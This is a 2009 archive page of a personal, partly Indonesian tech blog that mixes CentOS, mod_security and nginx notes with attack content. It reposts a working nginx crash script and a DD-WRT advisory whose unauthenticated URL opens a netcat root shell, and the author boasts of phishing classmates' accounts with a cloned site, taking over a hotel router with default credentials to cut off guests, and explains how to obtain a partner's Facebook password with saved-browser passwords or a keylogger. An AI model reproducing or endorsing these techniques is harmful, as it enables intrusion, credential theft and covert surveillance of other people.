Thursday, December 24, 2009

ClarkConnect 5



this my clarkconnect , i give screen shoot to you , im not blame with mikrotik anymore cause i use too in my office :) , but this is free ( community edition )


Work = Net , live and Music ......

Wednesday, October 28, 2009

Centos 5.4

The CentOS team is pleased to announce the availability of CentOS 5.4. Major changes in CentOS 5 compared to CentOS 4 include:

These updated software versions: Apache-2.2, php-5.1.6, kernel-2.6.18, Gnome-2.16, KDE-3.5, OpenOffice.org-2.3, Evolution-2.12, Firefox-3.0, Thunderbird-2.0, MySQL-5.0, PostgreSQL-8.

Better desktop support with compiz and AIGLX.

Virtualization provided by the Xen hypervisor with Virtual Machine Manager and libvirt.

Major changes compared to earlier CentOS 5 versions include:

KVM as a preview for the new virtualization technology in Enterprise Linux.

ext4 as a technology preview in file systems.

Source : www.centos.org

download from local ix ( Indonesia )

http://mirror.unej.ac.id/centos/5.4/isos/i386/

Monday, October 26, 2009

Sql injection and mod security - black and white

this noon , we read mail from someone and he claim he find sql injection in our site , how it can be ... , magic quota still off and mod_security not yet installed

see this article

from : http://www.cyberciti.biz/faq/rhel-fedora-centos-httpd-mod_security-configuration/

Red Hat / CentOS Install mod_security Apache Intrusion Detection And Prevention Engine

by Vivek Gite

How do I install ModSecurity - an open source intrusion detection and prevention engine for web applications under CentOS / RHEL / Red Hat Enterprise Linux 5.x server?

ModSecurity operates embedded into the web server (httpd), acting as a powerful umbrella - shielding web applications from attacks. In order to use mod_security, you need to turn on EPEL repo under CentOS / RHEL Linux. Once repo is turned on, type the following command to install ModSecurity:
# yum install mod_security
Sample output:

Loaded plugins: downloadonly, fastestmirror, priorities, protectbase
Loading mirror speeds from cached hostfile
* epel: www.gtlib.gatech.edu
* base: mirror.skiplink.com
* updates: centos.aol.com
* addons: mirror.cs.vt.edu
* extras: mirror.trouble-free.net
0 packages excluded due to repository protections
Setting up Install Process
Parsing package install arguments
Resolving Dependencies
--> Running transaction check
---> Package mod_security.x86_64 0:2.5.9-1.el5 set to be updated
--> Finished Dependency Resolution

Dependencies Resolved

Package Arch Version Repository Size

Installing:
mod_security x86_64 2.5.9-1.el5 epel 935 k

Transaction Summary

Install 1 Package(s)
Update 0 Package(s)
Remove 0 Package(s)

Total download size: 935 k
Is this ok [y/N]: y
Downloading Packages:
mod_security-2.5.9-1.el5.x86_64.rpm | 935 kB 00:00
Running rpm_check_debug
Running Transaction Test
Finished Transaction Test
Transaction Test Succeeded
Running Transaction
Installing : mod_security [1/1]

Installed: mod_security.x86_64 0:2.5.9-1.el5
Complete!

mod_security configuration files

1. /etc/httpd/conf.d/mod_security.conf - main configuration file for the mod_security Apache module.
2. /etc/httpd/modsecurity.d/ - all other configuration files for the mod_security Apache.
3. /etc/httpd/modsecurity.d/modsecurity_crs_10_config.conf - Configuration contained in this file should be customized for your specific requirements before deployment.
4. /var/log/httpd/modsec_debug.log - Use debug messages for debugging mod_security rules and other problems.
5. /var/log/httpd/modsec_audit.log - All requests that trigger a ModSecurity events (as detected) or a serer error are logged ("RelevantOnly") are logged into this file.

Open /etc/httpd/modsecurity.d/modsecurity_crs_10_config.conf file, enter:
# vi /etc/httpd/modsecurity.d/modsecurity_crs_10_config.conf
Make sure SecRuleEngine set to "On" to protect webserver for the attacks:

SecRuleEngine On

Turn on other required options and policies as per your requirements. Finally, restart httpd:
# service httpd restart
Make sure everything is working:
# tail -f /var/log/httpd/error_log

see your file in

/var/log/httpd/

modsec_debug.log
modsec_audit.log

Congratulation : Global Conference on Open Source (GCOS)

Sunday, October 25, 2009

Redirect and Phising Facebook

This night very smooth just open my eyes and read the security around the world, facebook is the biggest social community and there are people can make the application like games , quiz and etc.

Can we Phising that ?... of course ...

have u read this

http://www.packetstormsecurity.com/0910-exploits/facebook-redir.txt

_00000__00000__00000__00000__0___0__00000____0___0___000___0___0_
_0______0___0__0___0__0______00_00__0________00_00__0___0__00_00_
_0000___00000__00000__00000__0_0_0__00000____0_0_0__0___0__0_0_0_
_____0______0______0__0______0___0__0________0___0__00000__0___0_
_0000___00000__00000__00000__0___0__00000____0___0__0___0__0___0_
_________________________________________________________________


# [+] Facebook Redirection
#
# [+] Author : 599eme Man
# [+] Contact : Flouf@live.fr
#
#[------------------------------------------------------------------------------------]
#
# [+] How use ?
#
# http://apps.facebook.com/quizzname/?next=[Redirection]
#
# [+] PoC :
#
# http://apps.facebook.com/quelendroitltwgzmv/?next=http://www.google.com
#
#[------------------------------------------------------------------------------------]

"Redirect Method" can make the trap , be carefull with your account facebook

check your nginx

http://www.packetstormsecurity.com/0910-exploits/nginx-dos.txt

debian:~# uname -a Linux debian 2.6.18-6-686 #1 SMP Thu Aug 20 21:56:59 UTC
2009 i686 GNU/Linux
debian:~# cat /etc/issue
Debian GNU/Linux 4.0 \n \l

debian:~# dpkg -l|grep nginx
ii nginx 0.4.13-2+etch2 small, but very powerful and efficient
debian:~# ps xauwww|grep worker|grep -v grep
www-data 3577 0.0 0.9 2688 928 ? S 01:50 0:00 nginx: worker process
debian:~# gdb -p 3577
GNU gdb 6.4.90-debian
Copyright (C) 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are

welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i486-linux-gnu".
Attaching to process 3577
Reading symbols from /usr/sbin/nginx...(no debugging symbols found)...done.
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
Reading symbols from /lib/tls/i686/cmov/libcrypt.so.1...(no debugging
symbols found)...done.
Loaded symbols for /lib/tls/i686/cmov/libcrypt.so.1
Reading symbols from /usr/lib/libpcre.so.3...(no debugging symbols
found)...done.
Loaded symbols for /usr/lib/libpcre.so.3
Reading symbols from /usr/lib/libz.so.1...(no debugging symbols
found)...done.
Loaded symbols for /usr/lib/libz.so.1
Reading symbols from /lib/tls/i686/cmov/libc.so.6...
(no debugging symbols found)...done.
Loaded symbols for /lib/tls/i686/cmov/libc.so.6
Reading symbols from /lib/ld-linux.so.2...(no debugging symbols
found)...done.
Loaded symbols for /lib/ld-linux.so.2
Reading symbols from /lib/tls/i686/cmov/libnss_compat.so.2...(no debugging
symbols found)...done.
Loaded symbols for /lib/tls/i686/cmov/libnss_compat.so.2
Reading symbols from /lib/tls/i686/cmov/libnsl.so.1...(no debugging symbols
found)...done.
Loaded symbols for /lib/tls/i686/cmov/libnsl.so.1
Reading symbols from /lib/tls/i686/cmov/libnss_nis.so.2...
(no debugging symbols found)...done.
Loaded symbols for /lib/tls/i686/cmov/libnss_nis.so.2
Reading symbols from /lib/tls/i686/cmov/libnss_files.so.2...(no debugging
symbols found)...done.
Loaded symbols for /lib/tls/i686/cmov/libnss_files.so.2
Failed to read a valid object file image from memory.
0xb7f06410 in ?? ()
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x08068f23 in ?? ()
(gdb) bt
#0 0x08068f23 in ?? ()
#1 0x080b0540 in ?? ()
#2 0x080a54e4 in ?? ()
#3 0x00000000 in ?? ()
(gdb) i r
eax 0x6d4 1748
ecx 0xbff21028 -1074655192
edx 0x80b1794 134944660
ebx 0x80b0540 134939968
esp 0xbff21880 0xbff21880
ebp 0xbff218d8 0xbff218d8
esi 0x80b5630 134960688
edi 0x80b0540 134939968
eip 0x8068f23 0x8068f23 <__gmon_start__@plt+126827>
eflags 0x10206 [ PF IF RF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
(gdb) q
The program is running. Quit anyway (and detach it)? (y or n) y
Detaching from program: /usr/sbin/nginx, process 3577
debian:~#

in nginx error log we can see :
2009/10/15 01:53:24 [alert] 2477#0: worker process 3577 exited on signal 11

===============================

here is same test on nginx compiled with debug :

(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
ngx_http_process_request_headers (rev=0x80c95d8) at
src/http/ngx_http_request.c:793
793 header.data[header.len++] = '.';
(gdb) bt
#0 ngx_http_process_request_headers (rev=0x80c95d8) at
src/http/ngx_http_request.c:793
#1 0x08069c63 in ngx_http_process_request_line (rev=0x80c95d8) at
src/http/ngx_http_request.c:702
#2 0x080668ff in ngx_http_init_request (rev=0x80c95d8) at
src/http/ngx_http_request.c:446
#3 0x0805f67e in ngx_epoll_process_events (cycle=0x80a59e8, timer=60000,
flags=)
at src/event/modules/ngx_epoll_module.c:518
#4 0x08056712 in ngx_process_events_and_timers (cycle=0x80a59e8) at
src/event/ngx_event.c:245
#5 0x0805cebd in ngx_worker_process_cycle (cycle=0x80a59e8, data=0x0) at
src/os/unix/ngx_process_cycle.c:728
#6 0x0805b9b1 in ngx_spawn_process (cycle=0x80a59e8, proc=0x805c8a2
, data=0x0,
name=0x808e46b "worker process", respawn=-2) at
src/os/unix/ngx_process.c:187
#7 0x0805c470 in ngx_start_worker_processes (cycle=0x80a59e8, n=1, type=-2)
at src/os/unix/ngx_process_cycle.c:327
#8 0x0805d442 in ngx_master_process_cycle (cycle=0x80a59e8) at
src/os/unix/ngx_process_cycle.c:119
#9 0x0804ae5b in main (argc=1, argv=0xbfd72ac4) at src/core/nginx.c:332
(gdb) i r $eip
eip 0x8068e52 0x8068e52
(gdb)

===============================

tested on versions 0.7.0 <= 0.7.61, 0.6.0 <= 0.6.38, 0.5.0 <= 0.5.37, 0.4.0
<= 0.4.14

================================
here is POC:

#!/usr/bin/perl
use IO::Socket;
if ($#ARGV != 0) {
print "Usage: ./nginx.pl \n";
exit;}
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => '80',
Proto => 'tcp');
$mysize = 4079;
$mymsg = "o" x $mysize;
print $sock "GET /$mymsg HTTP/1.1\r\n\r\n";

while(<$sock>) {
print;
}


I try to check nginx version see this

[root@vx066-findtoyou-cen ~]# rpm -qa | grep nginx
nginx-0.6.39-1.el5
[root@vx066-findtoyou-cen ~]# vi nginx.pl
[root@vx066-findtoyou-cen ~]# vi nginx.pl
[root@vx066-findtoyou-cen ~]# perl nginx.pl 127.0.0.1
HTTP/1.1 400 Bad Request
Server: nginx/0.6.39
Date: Sat, 24 Oct 2009 20:29:33 GMT
Content-Type: text/html
Content-Length: 173
Connection: close

[root@vx066-findtoyou-cen ~]# ./nginx.pl 127.0.0.1
bash: ./nginx.pl: Permission denied
[root@vx066-findtoyou-cen ~]# chmod +x nginx.pl
[root@vx066-findtoyou-cen ~]# ./nginx.pl 127.0.0.1
HTTP/1.1 400 Bad Request
Server: nginx/0.6.39
Date: Sat, 24 Oct 2009 20:30:06 GMT
Content-Type: text/html
Content-Length: 173
Connection: close


and please check your nginx now :) .........

Saturday, September 05, 2009

Hacking Sms Centre

this story is begun when i have the nokia phone 3330 series , join forum community and get infomation about seeking sms centre in this country , when in 2003 indonesia have three operator selular like telkomsel , indosat and proxl , and i have three collection with that , hmm maybe 10 sim card i'd have in my stuff

about 5 hour per day im start with seeking sms centre with my old nokia phones.


binggo my seeker find the one sms centre :... Indosat : +62855000904-906 ( im3 ) the enigma ive got charge Rp -5.000.000 ( im3 ) LOL hahahahahaha

but now is closed and not free again ...

download : http://smsclist.com/downloads/

there is thousand smscentre in this world , be patient for seeking. im just share this for educational only , now in this year send message with sms i think very cheap and is your choice ...

greets to : fulvian , crushbonez for share this software

Thursday, August 13, 2009

Lack connection

about 1 day ago , internet in this office like a snail , what is goin happen. i try to remote 10 server but same problem , hmmm maybe earthquake again and its true

Disaster

read this :

Asian undersea cable disruption slows Internet access


By Sumner Lemon
IDG News Service (Singapore Bureau)
August 13, 2009

SINGAPORE - A segment of the Asia-Pacific Cable Network 2 (APCN2) undersea cable network between China and Taiwan suffered a serious cable fault on Wednesday, causing Internet traffic to be rerouted onto other undersea cables and slowing Internet access for some users in Southeast Asia.

At about 10:50 a.m. on Wednesday, local time, an alarm signaled a cable fault on Segment 7 of APCN2, which connects Hong Kong and Shantou, China. The disruption caused a temporary loss of service on the undersea link but all customers that use the cable were soon shifted to capacity on other cables, according to a source familiar with the situation.

The APCN2 cable is owned by a consortium of 26 telecom operators from 14 different countries. The cable links Singapore, Malaysia, the Philippines, Hong Kong, Taiwan, China, South Korea and Japan.

The exact cause of the APCN2 fault was not immediately known. The alarm indicated the disruption was caused by a “single point of failure,” which suggests a variety of possibilities, including a technical failure or a cable cut, the source said. One cause can apparently be ruled out: Taiwan’s Central Weather Bureau did not record signs of seismic activity around the time that the alarm was received.

The incident was likely the main reason that Internet access appeared slower for some users in Singapore on Wednesday, the source said.

Undersea cables are used to transport much of the world’s Internet traffic and can be easily damaged by natural disasters or other causes. In 2006, a powerful earthquake off the southern coast of Taiwan damaged several cables and slowed Internet access to a crawl for users in Southeast Asia.

Singapore Telecommunications (SingTel), which is an investor in APCN2, said its users may experience slower Internet access than normal to some U.S. Web sites, blaming the APCN2 fault on damage caused by Typhoon Morakot.

“The [APCN2] consortium members have started restoration works, and our engineers are in the process of diverting Internet traffic to other cable systems. We expect the situation to return to acceptable levels within the next 24 hours,” SingTel spokesman Chia Boon Chong, said in an e-mail statement.

A spokesman for Starhub, another Singapore ISP that holds a stake in the cable, did not return a phone call seeking comment.

The fault that hit APCN2 on Wednesday follows two other service disruptions that recently hit the network. One disruption affected APCN2 Segment 7, between Hong Kong and Taiwan, and the other affected APCN2 Segment 1, which connects Singapore and Malaysia. However, both of these disruptions were deemed to be “relatively minor” compared to the disruption that took place Wednesday morning, the source said.

The cause of the two earlier faults on APCN2 was not immediately clear.

APCN2 isn’t the only Asian undersea cable currently suffering from a service disruption.

“The Cable & Wireless Real Time Operations Team have logged multiple cable breaks on APCN2, APCN, EAC and SMW3 in Asia Pacific — specifically, near Taiwan. Network traffic flow has been adversely affected in and out of the region as a result,” said Gavin Tait, director of Asia network planning and implementation at Cable & Wireless, in an e-mail statement provided by the company.

None of Cable & Wireless’ customers were affected by these failures, he said.

Efforts are currently underway to repair the East Asia Crossing (EAC) undersea cable after it experienced “double faults” off the coast of Taiwan last weekend, according to Roland Lim, a spokesman for Pacnet, which owns EAC.

The first sign of damage to the EAC cable off the coast of Taiwan came on Aug. 9 at 1:37 a.m., local time, when an alarm signalled that service on EAC Segment D, which links Taiwan and Hong Kong, had been disrupted, Pacnet said in an Aug. 10 Network Event Notification that was obtained by IDG News Service. At the time, traffic on Segment D was transferred to EAC Segment C. However, Segment C suffered a second disruption roughly twelve hours later.

The cause of the faults that hit the EAC cable between Hong Kong and Taiwan is not yet known, but the damage happened at about the same time the southern part of the island and China’s southern coast was being pummeled by one of the most powerful typhoons to strike in recent memory. There were no earthquakes recorded by Taiwan’s Central Weather Bureau at the time when the disruptions took place.

original link
http://computerworld.com.ph/tag/apcn-2/


By Dan Nystedt
IDG News Service (Taipei Bureau)
August 13, 2009

TAIPEI - Deep sea landslides caused by Typhoon Morakot severed at least three undersea fiber-optic telecommunications cables and disrupted three others, causing Internet service disruptions in parts of Asia.

The SWM-3 (Southeast Asia - Middle East - Western Europe 3) cable that connects to Taiwan near the east coast city of Taitung was first hit by undersea landslides on August 9 as Typhoon Morakot approached the island, according to a statement from Chunghwa Telecom, Taiwan’s largest telecommunications provider.

On Wednesday, further undersea landslides caused by Morakot severed two more undersea fiber optic cables, APCN (Asia Pacific Cable Network) and APCN2, the company said.

The cable breaks disrupted Internet and telecommunications connectivity to China and parts of Southeast Asia, including Singapore, the Philippines and Hong Kong, but Chunghwa was able to restore service quickly by using backup systems and rerouting traffic to other cables.

The three other cables disrupted by undersea landslides were the C2C Cable Network East Asia Crossing (EAC), C2C Cable Network (C2C) and FLAG (Fiber Optic Link Around The Globe) North Asia Loop (FNAL).

Chunghwa said it has already sent workers to assess damage and begin repairs on the undersea cables. The company was unable to immediately say when the cables might be mended. To keep Internet and telecommunications flowing in the region, Chunghwa has been in contact with other telecommunications service providers and rerouted traffic on unaffected cables.

The company warned that unaffected cables carrying additional Internet and telecommunications traffic may not be able to handle all normal traffic flow, thereby causing slow service at some times.

Undersea fiber optic cables carry the bulk of the world’s Internet and communications traffic. Natural disasters such as earthquakes and deep sea landslides can disrupt the cables.

Typhoon Morakot killed 103 people in Taiwan, according to government figures, and officials expect the toll to continue to rise. The military and police were on Wednesday able to save 700 people stranded in mountain villages near the southern city of Kaohsiung after landslides and mud flows engulfed entire towns, including Cishan Township. Thousands remain stranded in disaster areas and rescue work continues.

Taiwan’s Council of Agriculture estimates the typhoon destroyed NT$9.01 billion (US$273.9 million) of crops and other goods.

http://computerworld.com.ph/typhoon-morakot-severs-three-undersea-internet-cables/

Thursday, August 06, 2009

inspiration will not end its just beginning ...



Now 6.30 PM , im still in the front of computer , preparing monthly report and spent little time with listen this music, its make me relax for a while , running with remote 18 shell box , is she superstar ? im say yes ... remembering .....


Aphrodite ...

Tuesday, August 04, 2009

Have u try gOS ??



Improving the Linux user experience...

Since our debut in 2007, gOS has been praised for being the most beautiful and easiest to use Linux operating system on the market. Now with our third and best version of gOS, we have carried on our effort to create a Linux for the rest of us.

..with Google Gadgets

Turn on your computer to a desktop full of your favorite widgets, fresh with live, personalized content just for you. We want to personally thank the Google Gadgets for Linux team for their efforts.

Read this :

http://www.thinkgos.com/gos/download.html


last release : gOS 3.1 Gadgets (SP1)

have u try gOS ??

Search Wiki From Shell Box

if you have a shell box ( unix ) you can search wiki , the simple command like this


dig +short txt .wp.dg.cx

as example :

dig +short txt indonesia.wp.dg.cx



source :

http://lifehacker.com/5329014/search-wikipedia-from-the-command-line

just spend a little time

This song i heard when in 1993 and it taken from The Album Format Masa Depan - Dewa 19 , ill remember this story , im just spend a little time for sharing my story ...



Ten Story love Song - Indonesian Love Song .......

Monday, August 03, 2009

Simple Trick to disconnect Yahoo Messenger

I have simple trick , how make your friend disconnect in your list , first of all

You can broadcast message like this :

Secret of Yahoo messenger 9

in your “type some contact information” you can input this :

http://us.lrd.yahoo.com/_ylc=X3oDMTIxN3RkOTNuBF9TAzM5ODMwMDk2NwRwb3MDMgRzZWMDbndfdG9wc3RvcmllcwRzbGsDdGl0bGUEdGFyA25ld3MueWFob28uY29t

and press enter , you will find the big secret of Yahoo messenger 9 .

hope you enjoy it ...


==============================================================



i think yahoo messenger have bug ...

http://us.lrd.yahoo.com/_ylc=X3oDMTIxN3RkOTNuBF9TAzM5ODMwMDk2NwRwb3MDMgRzZWMDbndfdG9wc3RvcmllcwRzbGsDdGl0bGUEdGFyA25ld3MueWFob28uY29t

if you browsing in this site , is the page cannot be found and its not worm :) , LOL

Hack Affiliate Program

This goin happen , 4 Years ago ... , when i'm still student in university , as student is really really happy when i've new phone , yeah ... new phone product from nokia 3330, but how the voucher ? what kind i do for buy ? its very expensive , in this era telecomunications have a monopoly , one operator who have a power its can be join the market.

ok this point ill give you story. In 2005 voucher affiliate program is popular , im search google with key : topup.com ( as the example ) , there a are many people who promotion this affiliate , wow great i got this idea ....

second method : social engineering , i have one site and owned by me with id=root ,
just copy topup.com i made same face with it hehehe , LOL , send the victim to browsing my shit site ...

username : blablabla
password : bla bla bla

and finally , got 100 account hehehehe LOL ( i try this method in class millist and its work LOL and i can read they inbox ) sorry dude

ok back to the topic again ...

next step .. i'm login into topup.com site and i can top up my voucher and i can call everyone and its freeee ... ( balance = rp 300.000 )... hehehehe

This is for educational only ... i'm just share experince for everyone ...

Friday, July 31, 2009

Good man in the good place

Hup hup horay , i got again my small bag include laptop charger and hp charger , i think lost for a while. My stuff lost when i'm going to train station with the taxi . I realize when I at the train station. i try didnt panic. Just thinking for a while ...

ill remember in my small bag have a guest bill complete with my address. in the friday night when im going to home i got package and i see his name.

i call him and say thanks for give back my stuff. i know he is good man ...

Special Big Thanks to : Mr Arifin ( Taxi driver ) for give back my stuff.

if u wanna get Taxi Driver in Semarang City - Indonesia , you can contact him : 6285225336158

www.findtoyou.com

www.findtoyou.com , this site owned by k1n9k0ng , beside have this one , he made finderonly ,what is the point you can get from this site ?

you can find rapidshare link, find megaupload , find pdf file , with crawler method

and you know who is he ?

he is top blogger in indonesia country, read this.

screen shot :



wanna try ?

Wednesday, July 29, 2009

Backtrack ...

One of the Backtrack linux distro is derived from a slackware which is the merger of whax collection and security auditors. Backtrack two released on 6 March 2007 which include more than 300 security tools while the beta 3 version of backtrack released on 14 December 2007 on the third release is more focused on hardware support. While the version of backtrack 3 was released on 19 June 2008 on the backtrack version 3 include this saint and maltego while nessus not included and still use the kernel version 2.6.21.5.

Official site links:

http://www.remote-exploit.org/backtrack.html

For Indonesian version can be read at the link below, coincidence I have ever following article article:

http://indobacktrack.or.id/

Greats to: Indobacktrack Team

If trouble downloading backtrack live CD can be download in here

http://repo.opensource.telkomspeedy.com/backtrack/

Happy learning .... smile


Source:
http://id.wikipedia.org/wiki/BackTrack

Last edited by thesims (24-07-2009 15:17:35)

Invisible ???

Are you hate if someone usually invisible in contact list , this is the solution , we make this in opensource server. hope you enjoy :


http://opensource.telkomspeedy.com/ym/


greets to : http://opensource.telkomspeedy.com

Sunday, July 26, 2009

Hore ... aku punya Hostpot di Santika Hotel

Duhai tepat jam 9 lebih 32 menit buka laptop dulu sudah lama sepertinya aku meninggalkan internet yang tercinta ini ( lebay mode on hehehehe ) iseng scan .. dapet deh hotspot , lumayan deh tuh gratisan cepet juga euuy , nah pas jam 11 mulai deh orang berduyun duyun makan , suara piring dll kedengeran banget disini. Tiba-tiba gw nerima telpon "Bal ada gangguan nih server" , wah gw cepet-cepet remote donk ke shell box ... ya ampun kok lambat banget aksesnya ya ... harus benerin nih ... , terpaksa gw keluar buat survey , celingak celinguk , ternyata sob banyak sekali pakai laptop , wah gimana cara nih gw bisa remote , akhirnya gw ke kamar lagi deh semedi dan ritual ala kadarnya

gw coba browsing ke www.showmyip.com

ip nya 125.x.x.x ( kek nya gw kenal nih ip ) dan gw yakin passwordnya ntuh

default :

user : admin
password : admin

lalu gw ketik di cmd ( maklum ubuntu lagi kernel panic , ala kadarnya aja deh pake vista ini juga terpaksa :) )

C:\Users\iqbal>ipconfig

Wireless LAN adapter Wireless Network Connection:

Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::30e2:cefa:6c53:6ca3%14
IPv4 Address. . . . . . . . . . . : 192.168.1.5
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.1

nah tuh gateway keluar kan

buka deh

http://192.168.1.1

masukin deh user name dan password diatas ...

nih screen syuutnya








akhir nya gw cut koneksi wireless client semua nya dulu , biar gw bisa remote box , terpaksa deh korbanin puluhan orang aja dibanding puluhan ribu :)

nah gak sampai situ juga , gw ganti aja nih password default nya daripada di take over , trus gw lagi butuh dan gak bisa connect tuh internet .

dah 10 menit gangguannya udah solve deh :) trus bukain lagi deh tuh .. kesian juga nih yang mau pake .... , cuma yang traffic nya gede paling gw cut off , lah kan gw pake juga ... yang penting gw gak buat wep 128 bit deh , kalo kata afgan - sadis

nah , kalo yang mau password ke http://192.168.1.1 nya trus lagi nginep di santika - semarang message me ajah ...

ini kok hotel kek punya gw ndiri ya hari ini ... ya mo gimana lagi ...

hack into inbox ...

Disini tidak mengajarkan suatu kejahatan , memang seram terdengar kata-kata "hack" , tapi sedikit lebih lumrah , semuanya berawal dari social engineering walau masih mystery tentang doi tapi saya bisa menerobos sebuah email , yah bisa juga inbox facebook biasa dijadikan sebuah social engineering ( isi inbox nya , selingkuhan , saingan atau doi udah punya hehehehe , semuanya terungkap ... ) misal nih elo pengen gebet tuh cewe , nah nih cewe suka facebookan , biasanya tuh seseorang males banget ketik password jadi ntuh password disimpen kan tu di mozilla


kalo elo punya laptop

1. tangan lo harus cepet simpen password facebook , lo pancing deh tuh buka facebook di mozilla , cepet2x deh tangan lo save hehehe , email juga begitu ... ( remmber password mozilla )

cara liatnya

tools - options - security - save password , show password

2. siapin senjata elo pake keylogger , banyak deh yang ampuh , ajakin doi buka fb , trus lo pura-pura beli rokok , keluar atau ke WC

kalo laptopnya punya doi

1. lo install mozilla dulu kalo gak ada tuh doi suruh download atau elo download
, nah disini intinya ajakin doi login facebook atau email , inget man !!! lo bilang deh pake rayuan : "rembember password di klik aja biar kamu inget say" atau apalah gaya ucapan elo sendiri juga boleh ,Nah ajakin terus main depan komputer , lo tahan deh tuh mata sampe dia bete ( masa' sih doi betah depan komputer , disini ketahanan elo harus kuat ... latihan lah didepan komputer tapi santai , pasti donk doi kemana gitu , buru-buru deh lo masuk klik di mozilla

tools - options - security - save password , show password ( hapalin cepet )

dah dapet kan login dan passnya sekarang lo bisa baca deh ...


maaf disini saya bukan mengajak seorang untuk menjadi posesif

seperti blognya bro bung ian

http://kei-kai.blogspot.com/2008/10/ternyata-pacar-posesif-itu-nyata.html

Thursday, July 23, 2009

Kata Sesepuh Baca Google .......

Sudah keseribu kesekian kali saya bilang ke temen saya , cari di google , apa sih susahnya mencari di google , padahal mudah sekali tinggal "buka google disana ilmu numplek plek sampe meriang meriang deh tuh :D kalo belajar disana " itu kata sesepuh saya , ilmu kanuragan sakti mandera guna yang
itemnya : mulai dari ilmu lo cari target kecil-kecilan sampe target yang segede gaban , nyepam2x , intip sana sini , dapetin ribuan email yang isinya cuma botnet doank , masuk ke wifi tetangga , deauth sana sini , wardriving di area hotspot , buka backtrack nemuin hole , cari local exploit , target root pasang backdoor dan kalo kalo
putihnya elo bisa dapetin : install network , routing squid , pake nginx , oprek router cisco , ngetrace mana yang titiknya putus , bgp , ospf , router RIP , java , josso , jboss , buat vhost , dns server , mail server pake zimbra banyak , nah skarang tinggal pilih lo mau jadi apaan , kalo untuk pengalaman bolehlah belajar semua , pake untuk kebaikan , susah menciptakannya ... sekarang tinggal gimana kreatif nya masing-masing dan seberapa waktu yang elo luangkan untuk itu semua :) minimal ya 12 jam depan komputer + internet cukup lah ...

Wednesday, July 22, 2009

DD-WRT (httpd service) Remote Command Execution Vulnerability

This is a remote root vulnerability in DD-WRT's httpd server. The bug exists
at the latest 24 sp1 version of the firmware.

The problem is due to many bugs and bad software design decisions. Here is
part of httpd.c:

859 if (containsstring(file, "cgi-bin")) {
860
861 auth_fail = 0;
862 if (!do_auth
863 (conn_fp, auth_userid, auth_passwd, auth_realm,
864 authorization, auth_check))
865 auth_fail = 1;


......... (snip)............

899
900 }
901 exec = fopen("/tmp/exec.tmp", "wb");
902 fprintf(exec, "export REQUEST_METHOD=\"%s\"\n", method);
903 if (query)
904 fprintf(exec, "/bin/sh %s/%s905 server_dir != NULL ?
server_dir : "/www",file);
906 else
907 fprintf(exec, "/%s/%s\n",
908 server_dir != NULL ? server_dir : "/www",
file);
909 fclose(exec);
910
911 if (query) {
912 exec = fopen("/tmp/exec.query", "wb");
913 fprintf(exec, "%s\n", query);

........................
Two issues there:
1) No metacharacters handling
2) Command gets executed even without successful authentication.
You are not going to see any output if not authenticated though.
.......................

914 free(query);
915 fclose(exec);
916 }
917
918 system2("chmod 700 /tmp/exec.tmp");
919 system2("/tmp/exec.tmp>/tmp/shellout.asp");

........... (snip)..........

926 if (auth_fail == 1) {
927 send_authenticate(auth_realm);
928 auth_fail = 0;

------------

3) issue 3: httpd runs as root :)



Now let's sum up (1), (2) and (3). Any unauthenticated attacker that can
connect to the management web interface can get easily root on the device via
his browser with an URL like:

http://routerIP/cgi-bin/;command_to_execute

There is a catch though: whitespaces break it. Anyway, they can be easily
replaced with shell variable like $IFS. So, getting root shell at 5555/tcp
becomes as easy as typing this in your browser's url bar:

http://routerIP/cgi-bin/;nc$IFS-l$IFS-p$IFS\5555$IFS-e$IFS/bin/sh


Voila (pretty old-school, eheh). Here is some (poor) video demonstrating the
problem:




Fortunately, httpd by default does not listen on the outbound interface.
However, this vulnerability can be exploited via a CSRF attack (the dd-wrt
device's owner does not even need to have an authenticated session on the web
UI which is bad, bad). However, a base authentication dialog will appear. In
IE even this can be supressed, see this one:

http://ha.ckers.org/blog/20090630/csrf-and-ignoring-basicdigest-auth/

Unlike the already documented CSRF vulnerability (
http://www.securityfocus.com/bid/32703 ) this DOES NOT need an authenticated
session. This means someone can even post some crafted [img] link on a forum
and a dd-wrt router owner visiting the forum will get owned :)


A weird vulnerability you're unlikely to see in 2009 :) Quite embarrassing I
would say :)


Thanks krassyo at krassyo.info for his support :)


Leka vecher :)

# milw0rm.com [2009-07-20]

Berapa banyak hospot yang terdapat di indonesia ya ... metode cukup mudah ... :D apalagi hole ddwrt ini cukup menggairahkan ...

nginx proxy

Nginx terbukti ampuh seperti kata teman saya , kali ini saya akan mencoba implementasi penggunaan nginx ini .... nih konfigurasinya


#######################################################################
#
# This is the main Nginx configuration file.
#
# More information about the configuration options is available on
# * the English wiki - http://wiki.codemongers.com/Main
# * the Russian documentation - http://sysoev.ru/nginx/
#
#######################################################################

#----------------------------------------------------------------------
# Main Module - directives that cover basic functionality
#
# http://wiki.codemongers.com/NginxMainModule
#
#----------------------------------------------------------------------

user nobody nobody;
worker_processes 2;

error_log /var/log/nginx/error.log;
#error_log /var/log/nginx/error.log notice;
#error_log /var/log/nginx/error.log info;

pid /var/run/nginx.pid;



#----------------------------------------------------------------------
# Events Module
#
# http://wiki.codemongers.com/NginxEventsModule
#
#----------------------------------------------------------------------

events {
worker_connections 1024;
}


#----------------------------------------------------------------------
# HTTP Core Module
#
# http://wiki.codemongers.com/NginxHttpCoreModule
#
#----------------------------------------------------------------------

http {
include /etc/nginx/mime.types;
default_type application/octet-stream;

log_format main '$remote_addr - $remote_user [$time_local] $request '
'"$status" $body_bytes_sent "$http_referer" '
'"$http_user_agent" "$http_x_forwarded_for"';

access_log /var/log/nginx/access.log main;

sendfile on;
#tcp_nopush on;
#tcp_noauth on ;
#keepalive_timeout 0;
keepalive_timeout 65;

gzip on;

# Load config files from the /etc/nginx/conf.d directory
include /etc/nginx/conf.d/*.conf;

#
# The default server
#
server {
listen 82;
server_name boc.telkom.net.id ;

